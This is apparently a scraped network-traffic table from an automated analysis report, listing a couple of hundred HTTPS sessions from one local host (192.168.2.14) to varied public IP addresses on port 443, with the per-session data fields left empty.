                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19081192.168.2.144833488.146.96.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19082192.168.2.143838299.212.198.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19083192.168.2.14364089.37.58.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19084192.168.2.1437544182.84.42.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19085192.168.2.1445338204.160.110.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19086192.168.2.144482889.179.118.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19087192.168.2.145463688.236.34.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19088192.168.2.1452126157.116.213.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19089192.168.2.144649670.187.60.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19090192.168.2.1452552195.217.255.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19091192.168.2.145371494.30.157.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19092192.168.2.143389876.252.121.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19093192.168.2.1439406147.221.21.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19094192.168.2.1455748196.175.144.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19095192.168.2.1457266164.87.21.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19096192.168.2.1451050128.11.73.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19097192.168.2.1433916206.22.203.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19098192.168.2.1440016223.21.88.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19099192.168.2.1436650182.86.42.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19100192.168.2.144016823.142.156.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19101192.168.2.145785020.39.113.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19102192.168.2.144084637.186.130.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19103192.168.2.146054275.254.62.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19104192.168.2.1454520120.188.79.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19105192.168.2.143989245.21.68.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19106192.168.2.1433400176.163.27.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19107192.168.2.1433750188.38.205.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19108192.168.2.1436872161.39.16.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19109192.168.2.145756241.217.19.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19110192.168.2.145412432.171.156.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19111192.168.2.1446352186.164.169.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19112192.168.2.144365073.126.102.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19113192.168.2.144493834.173.185.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19114192.168.2.1435284208.210.91.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19115192.168.2.144841488.239.54.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19116192.168.2.14352225.167.12.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19117192.168.2.1452266185.13.77.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19118192.168.2.1444538172.136.221.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19119192.168.2.1452766132.156.33.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19120192.168.2.143278220.192.164.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19121192.168.2.143635469.165.72.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19122192.168.2.1439910122.225.52.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19123192.168.2.1454618213.250.245.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19124192.168.2.1455318140.140.102.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19125192.168.2.143594884.133.128.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19126192.168.2.1435810147.55.159.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19127192.168.2.1452002212.153.125.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19128192.168.2.1435530160.201.190.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19129192.168.2.146085294.0.106.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19130192.168.2.143837492.134.36.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19131192.168.2.144653259.133.18.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19132192.168.2.145814071.135.176.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19133192.168.2.143898275.21.151.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19134192.168.2.1433976143.138.7.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19135192.168.2.1438456197.118.14.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19136192.168.2.1437396161.205.31.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19137192.168.2.1437930187.144.216.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19138192.168.2.1455402189.224.70.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19139192.168.2.1442688164.69.137.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19140192.168.2.1456370201.247.27.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19141192.168.2.14548722.129.148.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19142192.168.2.1447234117.202.188.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19143192.168.2.1443132123.64.114.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19144192.168.2.1444972189.43.84.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19145192.168.2.143549631.189.255.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19146192.168.2.145433645.167.103.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19147192.168.2.1444810140.171.31.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19148192.168.2.1433014162.44.121.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19149192.168.2.1459796208.29.136.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19150192.168.2.1432856164.191.58.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19151192.168.2.144382264.48.113.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19152192.168.2.1457032170.7.143.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19153192.168.2.1457674164.117.85.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19154192.168.2.1459906199.192.92.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19155192.168.2.1453634159.121.29.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19156192.168.2.1449686161.151.64.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19157192.168.2.1450596199.70.129.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19158192.168.2.1454826193.11.212.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19159192.168.2.1433654128.155.99.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19160192.168.2.1456352100.212.225.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19161192.168.2.146022067.138.210.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19162192.168.2.1458042129.72.90.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19163192.168.2.145353651.252.235.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19164192.168.2.1455784114.215.69.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19165192.168.2.145678043.174.81.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19166192.168.2.14378682.26.187.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19167192.168.2.1454636205.141.236.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19168192.168.2.143625862.61.90.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19169192.168.2.144801064.75.159.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19170192.168.2.1459858186.166.100.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19171192.168.2.1442550194.101.96.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19172192.168.2.143400681.179.111.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19173192.168.2.1445044194.135.238.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19174192.168.2.1438042162.133.251.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19175192.168.2.145032825.242.106.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19176192.168.2.1435046114.81.209.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19177192.168.2.1453508184.162.15.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19178192.168.2.144079834.207.228.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19179192.168.2.1458204136.163.171.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19180192.168.2.1441862190.200.188.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19181192.168.2.1436106152.244.129.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19182192.168.2.1436164133.167.12.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19183192.168.2.1453038186.3.223.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19184192.168.2.145515827.47.134.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19185192.168.2.1448698148.127.32.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19186192.168.2.144517693.198.83.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19187192.168.2.1443712161.187.64.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19188192.168.2.1434622219.217.37.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19189192.168.2.146056896.178.72.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19190192.168.2.145270690.169.24.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19191192.168.2.145957469.174.31.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19192192.168.2.144965613.46.145.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19193192.168.2.145911042.235.156.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19194192.168.2.1453936111.87.75.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19195192.168.2.1447638202.66.252.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19196192.168.2.1434948133.214.102.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19197192.168.2.1460502158.105.62.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19198192.168.2.1458606173.43.143.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19199192.168.2.144906089.35.75.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19200192.168.2.1451246141.180.77.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19201192.168.2.144897075.165.246.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19202192.168.2.1450082111.98.248.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19203192.168.2.1443632133.112.1.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19204192.168.2.145959039.55.77.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19205192.168.2.1444716158.141.51.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19206192.168.2.1438474210.96.15.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19207192.168.2.144303089.15.210.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19208192.168.2.1452702106.106.85.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19209192.168.2.1449488219.85.110.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19210192.168.2.1460356213.190.224.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19211192.168.2.1439890157.65.88.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19212192.168.2.1451218186.60.254.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19213192.168.2.145360677.119.102.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19214192.168.2.1450802107.190.124.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19215192.168.2.1449722113.15.225.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19216192.168.2.1460008115.153.108.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19217192.168.2.1451616182.245.158.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19218192.168.2.1452674176.57.112.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19219192.168.2.144354236.80.39.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19220192.168.2.145188837.243.108.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19221192.168.2.143347694.124.234.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19222192.168.2.145651448.159.188.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19223192.168.2.1458540142.142.77.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19224192.168.2.1455312116.52.136.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19225192.168.2.1457826153.42.90.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19226192.168.2.14431889.86.190.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19227192.168.2.1455972199.66.165.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19228192.168.2.1441178197.22.102.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19229192.168.2.144915658.116.132.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19230192.168.2.1458996212.249.158.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19231192.168.2.144305048.39.75.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19232192.168.2.1436104135.112.205.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19233192.168.2.144435092.143.62.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19234192.168.2.1437156220.112.45.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19235192.168.2.145183883.98.161.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19236192.168.2.1441648141.100.31.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19237192.168.2.1446306153.2.21.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19238192.168.2.14433268.137.228.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19239192.168.2.143963643.239.30.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19240192.168.2.1437190128.189.149.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19241192.168.2.1443438153.148.149.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19242192.168.2.1442950206.236.12.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19243192.168.2.143840452.95.126.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19244192.168.2.1440738135.233.253.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19245192.168.2.1435748217.248.56.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19246192.168.2.143744080.199.238.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19247192.168.2.1459794177.109.154.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19248192.168.2.145417412.199.212.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19249192.168.2.145953460.185.134.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19250192.168.2.1442426124.212.154.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19251192.168.2.143347053.57.75.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19252192.168.2.1452808169.124.246.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19253192.168.2.1433596152.67.33.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19254192.168.2.1437038105.179.69.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19255192.168.2.1452020181.100.108.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19256192.168.2.1433734150.246.12.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19257192.168.2.144149084.169.250.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19258192.168.2.144461460.101.251.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19259192.168.2.1434724114.140.237.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19260192.168.2.144234063.200.190.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19261192.168.2.1455272212.180.227.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19262192.168.2.1436200185.90.164.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19263192.168.2.1436138144.169.213.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19264192.168.2.1453004112.233.189.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19265192.168.2.1457640207.224.174.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19266192.168.2.1459906197.169.174.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19267192.168.2.145125457.9.136.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19268192.168.2.1438278194.6.25.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19269192.168.2.1440450143.115.167.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19270192.168.2.1444028159.189.152.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19271192.168.2.143920086.15.235.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19272192.168.2.1457972206.41.31.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19273192.168.2.1448692148.184.115.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19274192.168.2.1442572183.49.9.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19275192.168.2.1440334111.123.19.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19276192.168.2.144348681.248.80.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19277192.168.2.1437376118.196.76.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19278192.168.2.1443164114.212.163.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19279192.168.2.1449108180.73.240.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19280192.168.2.143872485.68.97.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19281192.168.2.144610840.21.9.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19282192.168.2.1456766129.0.108.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19283192.168.2.1438096153.119.1.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19284192.168.2.14579048.52.71.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19285192.168.2.145163082.52.192.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19286192.168.2.144161431.1.173.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19287192.168.2.1438746108.209.182.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19288192.168.2.1455986206.62.132.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19289192.168.2.144694075.96.178.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19290192.168.2.143897460.105.230.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19291192.168.2.145421842.219.175.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19292192.168.2.14468625.136.7.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19293192.168.2.144245093.204.115.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19294192.168.2.145877045.53.75.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19295192.168.2.1458436176.13.52.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19296192.168.2.1454072171.73.202.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19297192.168.2.143701869.132.221.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19298192.168.2.145074249.144.113.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19299192.168.2.1441424131.87.78.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19300192.168.2.1439714145.239.193.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19301192.168.2.1435398218.254.120.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19302192.168.2.1460596195.80.56.229443
